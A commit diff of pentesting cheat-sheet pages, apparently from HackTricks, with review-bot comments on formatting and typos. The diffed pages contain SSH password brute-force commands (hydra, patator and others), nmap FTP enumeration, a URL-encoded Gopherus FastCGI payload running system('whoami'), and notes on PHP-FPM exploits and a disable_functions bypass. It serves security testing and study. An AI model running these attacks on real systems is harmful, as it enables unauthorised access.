GitBook: [master] 6 pages and 12 assets modified
@ -367,6 +367,7 @@ msf> use auxiliary/scanner/mssql/mssql_login #Be carefull, you can block account
|
||||||
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
hydra -l root -P passwords.txt [-t 32] <IP> ssh
|
||||||
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
|
||||||
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
|
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
|
||||||
|
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
|
||||||
```
|
```
|
||||||
|
|
||||||
### Telnet
|
### Telnet
|
||||||
|
|
|
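Review bot: the added patator line uses the placeholder `<ip>` while the hydra, ncrack and medusa lines in the same table use `<IP>`; align it to `<IP>` so readers substitute values consistently. The lockout caveat that the hunk header already attaches to the mssql_login line ("Be carefull, you can block account") applies just as much to these SSH password-list commands, so a short note that repeated failed logins can lock the account and will show up in the target's auth logs belongs next to this table as well.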
@ -130,7 +130,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
||||||
|
|
||||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
|
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced \(search for `Section start`\).
|
||||||
|
|
||||||
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
![](../../../.gitbook/assets/image%20%28477%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
||||||
|
|
||||||
### USB Detective
|
### USB Detective
|
||||||
|
|
||||||
|
|
|
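Review bot: the only change in this hunk is the image path, and the new name `image (477) (2) (2) (2) (2) (1).png` just appends one more `(2)` to an already duplicated-looking filename; this pattern recurs across the commit and suggests the same asset is re-uploaded instead of reused, so deduplicate it and point all pages at a single copy. In the unchanged context, "the timestamps about when the USB connection was produced" reads awkwardly; "the timestamps of when the USB device was connected" is clearer.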
@ -601,7 +601,7 @@ Many apps log informative \(and potentially sensitive\) messages to the console
|
||||||
5. Reproduce the problem.
|
5. Reproduce the problem.
|
||||||
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
||||||
|
|
||||||
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
![](../../.gitbook/assets/image%20%28466%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
|
||||||
|
|
||||||
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
||||||
|
|
||||||
|
|
|
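Review bot: same asset rename as in the USB page, with another `(2)` appended to `image (466) ...png`; reuse one asset rather than re-uploading. Two small documentation points in the unchanged context: "as explained in Accessing the Device Shell" names a section without linking it, and "view the console logs on a separate window" should be "in a separate window".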
@ -6,7 +6,7 @@
|
||||||
|
|
||||||
## Attacks Graphic
|
## Attacks Graphic
|
||||||
|
|
||||||
![](../../.gitbook/assets/image%20%28554%29.png)
|
![](../../.gitbook/assets/image%20%28535%29%20%281%29.png)
|
||||||
|
|
||||||
## Tool
|
## Tool
|
||||||
|
|
||||||
|
|
|
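Review bot: the Attacks Graphic is swapped from `image (554).png` to `image (535) (1).png` with empty alt text in `![](...)`, so a reviewer cannot tell from the diff which diagram is intended; add alt text describing the graphic, and check that the `(1)`-suffixed file is the intended replacement rather than a stale duplicate upload.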
@ -15,6 +15,7 @@ PORT STATE SERVICE
|
||||||
## Enumeration
|
## Enumeration
|
||||||
|
|
||||||
### Nmap FTP scripts
|
### Nmap FTP scripts
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
nmap --script ftp-* -p 21 <ip>
|
nmap --script ftp-* -p 21 <ip>
|
||||||
```
|
```
|
||||||
|
|
|
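Review bot: the header says one line was added (`-15,6 +15,7`) but no added line is visible in this hunk, so confirm the change is a deliberate blank line and not an accidental one. On the unchanged command, `ftp-*` should be quoted as `nmap --script "ftp-*" -p 21 <ip>`: an unquoted glob is expanded by the shell when a matching file exists in the working directory, and nmap then never sees the pattern.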
@ -13,7 +13,7 @@ Normally web pages, files and all of the documents which are transferred from th
|
||||||
|
|
||||||
If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public\_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client.
|
If **CGI** is installed on the server, the specific cgi-bin directory is also added there, for example home/user/public\_html/cgi-bin. CGI scripts are stored in this directory. **Each file in the directory is treated as an executable program**. When accessing a script from the directory, the server sends request to the application, responsible for this script, instead of sending file's content to the browser. **After the input data processing is completed, the application sends the output data** to the web server which forwards the data to the HTTP client.
|
||||||
|
|
||||||
For example, when the CGI script http://mysitename.com/**cgi-bin/file.pl** is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. \(explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)\)
|
For example, when the CGI script [http://mysitename.com/\*\*cgi-bin/file.pl\*\*](http://mysitename.com/**cgi-bin/file.pl**) is accessed, the server will run the appropriate Perl application through CGI. The data generated from script execution will be sent by the application to the web server. The server, on the other hand, will transfer data to the browser. If the server did not have CGI, the browser would have displayed the **.pl** file code itself. \(explanation from [here](https://help.superhosting.bg/en/cgi-common-gateway-interface-fastcgi.html)\)
|
||||||
|
|
||||||
### FastCGI
|
### FastCGI
|
||||||
|
|
||||||
|
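Review bot: the rewritten link `[http://mysitename.com/\*\*cgi-bin/file.pl\*\*](http://mysitename.com/**cgi-bin/file.pl**)` puts literal escaped asterisks in the link text and `**` inside the href, so the rendered URL is wrong; revert to the original plain text with `cgi-bin/file.pl` in bold, or, if a link is wanted, use the clean URL as the href and keep the bold outside the link. Minor grammar in the unchanged context: "the server sends request to the application, responsible for this script, instead of sending file's content" should be "sends a request to the application responsible for this script instead of sending the file's content".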
@ -21,10 +21,6 @@ For example, when the CGI script http://mysitename.com/**cgi-bin/file.pl** is ac
|
||||||
|
|
||||||
The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open_Market) introduced **FastCGI – a high performance version of the CGI technology with enhanced capabilities.**
|
The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity, as well to address the scalability shortcomings of CGI technology. To meet those requirements [Open Market](http://en.wikipedia.org/wiki/Open_Market) introduced **FastCGI – a high performance version of the CGI technology with enhanced capabilities.**
|
||||||
|
|
||||||
## RCE \(7.\[123\].x\)
|
|
||||||
|
|
||||||
This [**metasploit module**](https://www.rapid7.com/db/modules/exploit/multi/http/php_fpm_rce/) exploits an underflow vulnerability in versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 of **PHP-FPM on Nginx**.
|
|
||||||
|
|
||||||
## disable\_functions bypass
|
## disable\_functions bypass
|
||||||
|
|
||||||
It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations.
|
It's possible to run PHP code abusing the FastCGI and avoiding the `disable_functions` limitations.
|
||||||
|
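Review bot: this hunk removes the `## RCE (7.[123].x)` heading and the sentence stating the affected version ranges (7.1.x below 7.1.33, 7.2.x below 7.2.24, 7.3.x below 7.3.11) for the PHP-FPM on Nginx metasploit module, yet the last hunk of this file still discusses CVE-2019-11043 and phuip-fpizdam; if this content was not moved elsewhere, that later section loses both its heading and the affected-version statement a defender needs to decide whether to patch. The unchanged sentence "The need to develop FastCGI is that Web was arisen by applications' rapid development and complexity" is garbled and should be reworded, for example "FastCGI was developed because of the rapid growth and complexity of web applications, and to address the scalability shortcomings of CGI".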
@ -32,14 +28,14 @@ It's possible to run PHP code abusing the FastCGI and avoiding the `disable_func
|
||||||
### Via Gopherus
|
### Via Gopherus
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or twitter [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
I'm not sure if this is working in modern versions because I tried once and it didn't execute anything. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or twitter \[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.\*\*
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
|
Using [Gopherus](https://github.com/tarunkant/Gopherus) you can generate a payload to send to the FastCGI listener and execute arbitrary commands:
|
||||||
|
|
||||||
![](../../../../.gitbook/assets/image%20%28385%29.png)
|
![](../../../../.gitbook/assets/image%20%28385%29.png)
|
||||||
|
|
||||||
Then, you can grab the urlencoded payload and decode it and transform to base64, [**using this recipe of cyberchef for example**](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=JTAxJTAxJTAwJTAxJTAwJTA4JTAwJTAwJTAwJTAxJTAwJTAwJTAwJTAwJTAwJTAwJTAxJTA0JTAwJTAxJTAxJTA0JTA0JTAwJTBGJTEwU0VSVkVSX1NPRlRXQVJFZ28lMjAvJTIwZmNnaWNsaWVudCUyMCUwQiUwOVJFTU9URV9BRERSMTI3LjAuMC4xJTBGJTA4U0VSVkVSX1BST1RPQ09MSFRUUC8xLjElMEUlMDJDT05URU5UX0xFTkdUSDc2JTBFJTA0UkVRVUVTVF9NRVRIT0RQT1NUJTA5S1BIUF9WQUxVRWFsbG93X3VybF9pbmNsdWRlJTIwJTNEJTIwT24lMEFkaXNhYmxlX2Z1bmN0aW9ucyUyMCUzRCUyMCUwQWF1dG9fcHJlcGVuZF9maWxlJTIwJTNEJTIwcGhwJTNBLy9pbnB1dCUwRiUxN1NDUklQVF9GSUxFTkFNRS92YXIvd3d3L2h0bWwvaW5kZXgucGhwJTBEJTAxRE9DVU1FTlRfUk9PVC8lMDAlMDAlMDAlMDAlMDElMDQlMDAlMDElMDAlMDAlMDAlMDAlMDElMDUlMDAlMDElMDBMJTA0JTAwJTNDJTNGcGhwJTIwc3lzdGVtJTI4JTI3d2hvYW1pJTIwJTNFJTIwL3RtcC93aG9hbWkudHh0JTI3JTI5JTNCZGllJTI4JTI3LS0tLS1NYWRlLWJ5LVNweUQzci0tLS0tJTBBJTI3JTI5JTNCJTNGJTNFJTAwJTAwJTAwJTAw). And then copy/pasting the abse64 in this php code:
|
Then, you can grab the urlencoded payload and decode it and transform to base64, \[**using this recipe of cyberchef for example**\]\([http://icyberchef.com/\#recipe=URL\_Decode%28%29To\_Base64%28'A-Za-z0-9%2B/%3D'%29&input=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](http://icyberchef.com/#recipe=URL_Decode%28%29To_Base64%28'A-Za-z0-9%2B/%3D'%29&input=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)\). And then copy/pasting the abse64 in this php code:
|
||||||
|
|
||||||
```php
|
```php
|
||||||
<?php
|
<?php
|
||||||
|
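Review bot: both rewritten lines escape the markdown into literal `**\*\*\[**` and `\]\(**` sequences, so the hint's contact links and the CyberChef recipe link will render as raw characters instead of links; keep the original `[**text**](url)` markup. While here, "abse64" in the unchanged context should be "base64", and the hint's own admission that the technique did not execute anything when tried would be more useful to readers if it stated which PHP version was tested.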
@ -51,7 +47,7 @@ Uploading and accessing this script the exploit is going to be sent to FastCGI \
|
||||||
### PHP exploit
|
### PHP exploit
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP \(somehow\) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via ****[**PEASS & HackTricks telegram group here**](https://t.me/peass), or twitter [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
I'm not sure if this is working in modern versions because I tried once and I couldn't execute anything. Actually I managed to see that `phpinfo()` from FastCGI execution indicated that `disable_functions` was empty, but PHP \(somehow\) was still preventing me from executing any previously disabled function. Please, if you have more information about this contact me via **\*\*\[**PEASS & HackTricks telegram group here**\]\(**[https://t.me/peass](https://t.me/peass)**\), or twitter \[**@carlospolopm**\]\(**[https://twitter.com/carlospolopm](https://twitter.com/carlospolopm)**\)**.\*\*
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
```php
|
```php
|
||||||
|
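Review bot: same escaping breakage as in the Gopherus hint: the contact links become literal `**\*\*\[**...\]\(**` text, so revert to the original markup. Since the hint says `phpinfo()` showed `disable_functions` empty while previously disabled functions still could not run, noting that observation as an open question in the text rather than only in the hint would help anyone verifying the technique.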
@ -435,5 +431,3 @@ You will find that the exploit is very similar to the previous code, but instead
|
||||||
You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test is using this docker environment: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).
|
You can exploit this vulnerability with [**phuip-fpizdam**](https://github.com/neex/phuip-fpizdam) and test is using this docker environment: [https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043](https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043).
|
||||||
You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**
|
You can also find an analysis of the vulnerability [**here**](https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc)**.**
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
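Review bot: this hunk only drops two trailing blank lines, which is fine, but the unchanged sentence has a typo: "test is using this docker environment" should be "test it using this docker environment". Given that the earlier hunk in this file removes the affected-version statement, this section is now the only place that names CVE-2019-11043 and would benefit from stating the fixed versions alongside the analysis link.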